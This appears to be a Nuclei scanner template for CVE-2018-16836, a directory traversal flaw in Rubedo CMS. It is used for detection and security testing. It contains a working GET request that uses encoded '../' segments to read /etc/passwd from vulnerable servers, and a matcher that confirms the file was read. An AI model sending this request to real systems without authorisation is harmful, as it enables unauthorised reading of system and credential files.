id: CVE-2018-16836 info: name: Rubedo CMS <=3.4.0 - Directory Traversal author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. reference: - https://www.exploit-db.com/exploits/45385 - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms - https://www.exploit-db.com/exploits/45385/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 tags: cve,cve2018,rubedo,lfi requests: - method: GET path: - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/05/13